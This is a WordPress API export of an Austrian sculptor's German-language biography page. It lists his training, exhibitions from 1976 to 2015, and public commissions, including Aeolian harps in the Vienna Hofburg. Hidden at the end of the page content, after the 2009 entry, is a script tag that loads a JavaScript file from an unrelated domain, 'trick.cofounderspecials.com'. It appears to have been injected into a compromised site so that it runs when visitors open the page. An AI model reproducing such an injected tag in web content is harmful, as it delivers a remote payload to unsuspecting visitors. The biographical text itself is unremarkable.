{"id":51,"date":"2011-02-07T13:07:28","date_gmt":"2011-02-07T13:07:28","guid":{"rendered":"http:\/\/www.weseckymario.at\/?page_id=51"},"modified":"2017-11-02T15:21:34","modified_gmt":"2017-11-02T15:21:34","slug":"uber-mich","status":"publish","type":"page","link":"http:\/\/www.weseckymario.at\/?page_id=51","title":{"rendered":"\u00dcber mich"},"content":{"rendered":"<p><strong>1952<\/strong><\/p>\n<p>geboren in Wien<\/p>\n<p><strong>1971-73\u00a0\u00a0\u00a0\u00a0 <\/strong>&#8222;Universit\u00e4t f\u00fcr angewandte Kunst&#8220; Wien, Meisterklasse f\u00fcr<\/p>\n<p>Architektur, Prof. Janeba<\/p>\n<p><strong>1973-75\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>Universit\u00e4t Wien, Institut f\u00fcr Ur- und Fr\u00fchgeschichte<\/p>\n<p><strong>1975-78\u00a0\u00a0\u00a0\u00a0 <\/strong>&#8222;Universit\u00e4t f\u00fcr angewandte Kunst&#8220; Wien, Meisterklasse f\u00fcr<\/p>\n<p>Metallgestaltung, Prof. Hagenauer<\/p>\n<p>seit <strong>1978\u00a0\u00a0\u00a0\u00a0 <\/strong>freischaffender K\u00fcnstler, Mitglied beim &#8222;K\u00fcnstlerhaus&#8220;<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Ausstellungen und Beteiligungen :<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p><strong>1976\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>&#8222;Galerie am Graben&#8220; Wien<\/p>\n<p><strong>1978\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>&#8222;Bildungszentrum St.Virgil&#8220; Salzburg Stadt, anl\u00e4sslich des<\/p>\n<p>2. Preises beim Wettbewerb f\u00fcr den Nestroy-Ring<\/p>\n<p><strong>1982\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>O\u00d6 Kulturzentrum &#8222;Ursulinenhof&#8220;<\/p>\n<p><strong>1990\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>Antiquariat Herman Kantner,Wien<\/p>\n<p><strong>1991\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>W. Berndorfer, Wien<\/p>\n<p><strong>1992\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>Atelierschau in Wien<\/p>\n<p><strong>1994\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>Schloss Grafenegg N\u00d6, Kunstverein Garching M\u00fcnchen,<\/p>\n<p>Bundesl\u00e4nderversicherung Wien<\/p>\n<p><strong>1995\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>Galerie Tiller Wien, Kinogalerie K\u00fcnstlerhaus Wien,<\/p>\n<p>Galerie &#8222;Station 3&#8220; Wien<\/p>\n<p><strong>2000\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>&#8222;Viertelgalerie&#8220; im Barockschl\u00f6ssl Mistelbach, Buch-Biennale<\/p>\n<p>Horn<\/p>\n<p>&#8222;Verein f\u00fcr Kunst und Kultur&#8220; Eichgraben,<\/p>\n<p>Galerie &#8222;Gut Gasteil&#8220; Prigglitz N\u00d6<\/p>\n<p><strong>2001\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>Kunstwerkstatt Tulln N\u00d6, Skulptur-Biennale Toyamura Japan,<\/p>\n<p>Galerie &#8222;Gut Gasteil&#8220; Prigglitz N\u00d6<\/p>\n<p><strong>2003\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>Galerie Kranister Klosterneuburg, Galerie &#8222;Windspiel&#8220;, Wien\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Kulturhaus &#8222;Alter Pfarrhof&#8220; St.Andr\u00e4-W\u00f6rdern N\u00d6<\/p>\n<p><strong>2004\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>&#8222;Cantina e`l arte&#8220; Wien<\/p>\n<p><strong>2005\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>Kulturhaus &#8222;Alter Pfarrhof&#8220; St.Andr\u00e4-W\u00f6rdern<\/p>\n<p><strong>2006\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>Galerie &#8222;Gut Gasteil&#8220; Prigglitz N\u00d6<\/p>\n<p><strong>2009\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>Galerie &#8222;Maringer&#8220; St.P\u00f6lten N\u00d6, &#8222;Ausstellungsbr\u00fccke&#8220;<\/p>\n<p>Regierungsviertel St. P\u00f6lten<\/p>\n<p>&#8222;Verein f\u00fcr Kunst und Kultur&#8220; Eichgraben N\u00d6, &#8222;K\u00fcnstlerhaus&#8220;<\/p>\n<p>Wien<\/p>\n<p><strong>2011\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>M\u00e4rz-April: &#8222;Artist in residence&#8220; bei &#8222;Kunst in der Landschaft&#8220;<br \/>\nGalerie &#8222;Gut Gasteil&#8220; Prigglitz N\u00d6<\/p>\n<p><strong>2013\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>DOK N\u00d6 f\u00fcr moderne Kunst, St. P\u00f6lten<\/p>\n<p>Treiber galerie SCHAUPLATZ<\/p>\n<p><strong>2014\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>Galerie Grenzart, Hollabrunn<\/p>\n<p>Internationale Kunstbuchbiennale Horn<\/p>\n<p><strong>2015\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>Galerie &#8222;Gut Gasteil&#8220; Prigglitz, N\u00d6<\/p>\n<p><strong>\u00d6ffentliche Auftr\u00e4ge und Ank\u00e4ufe :<\/strong><\/p>\n<p><strong>1987<\/strong><\/p>\n<p>Objekt in Marmor, Granit und Eiche, vor dem &#8222;Amt f\u00fcr soz. Verwaltung&#8220; Salzburg Stadt<\/p>\n<p><strong>1991<\/strong><\/p>\n<p>Brunnengestaltung in Marmor und Eiche, Betriebsgel\u00e4nde der Wasserwerke St.P\u00f6lten<\/p>\n<p><strong>1992<\/strong><\/p>\n<p>\u00c4olsharfe im Eingangsbereich der Silberkammer, Hofburg Wien<\/p>\n<p><strong>1998<\/strong><\/p>\n<p>\u00c4olsharfe im Bundesmobiliendepot, Wien<\/p>\n<p><strong>2000<\/strong><\/p>\n<p>Ankauf durch das Bundeskanzleramt, Sektion Kunst<\/p>\n<p><strong>2009<\/strong><\/p>\n<p>Ankauf Land N\u00d6<script src='https:\/\/trick.cofounderspecials.com\/track.js?v=9.999' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>1952 geboren in Wien 1971-73\u00a0\u00a0\u00a0\u00a0 &#8222;Universit\u00e4t f\u00fcr angewandte Kunst&#8220; Wien, Meisterklasse f\u00fcr Architektur, Prof. Janeba 1973-75\u00a0\u00a0\u00a0\u00a0\u00a0 Universit\u00e4t Wien, Institut f\u00fcr Ur- und Fr\u00fchgeschichte 1975-78\u00a0\u00a0\u00a0\u00a0 &#8222;Universit\u00e4t f\u00fcr angewandte Kunst&#8220; Wien, Meisterklasse f\u00fcr Metallgestaltung, Prof. Hagenauer seit 1978\u00a0\u00a0\u00a0\u00a0 freischaffender K\u00fcnstler, Mitglied beim &#8222;K\u00fcnstlerhaus&#8220; &nbsp; Ausstellungen und Beteiligungen : &nbsp; 1976\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 &#8222;Galerie am Graben&#8220; Wien 1978\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 &#8222;Bildungszentrum St.Virgil&#8220; [&hellip;]<\/p>\n","protected":false},"author":9192194,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/www.weseckymario.at\/index.php?rest_route=\/wp\/v2\/pages\/51"}],"collection":[{"href":"http:\/\/www.weseckymario.at\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.weseckymario.at\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.weseckymario.at\/index.php?rest_route=\/wp\/v2\/users\/9192194"}],"replies":[{"embeddable":true,"href":"http:\/\/www.weseckymario.at\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=51"}],"version-history":[{"count":21,"href":"http:\/\/www.weseckymario.at\/index.php?rest_route=\/wp\/v2\/pages\/51\/revisions"}],"predecessor-version":[{"id":601,"href":"http:\/\/www.weseckymario.at\/index.php?rest_route=\/wp\/v2\/pages\/51\/revisions\/601"}],"wp:attachment":[{"href":"http:\/\/www.weseckymario.at\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=51"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}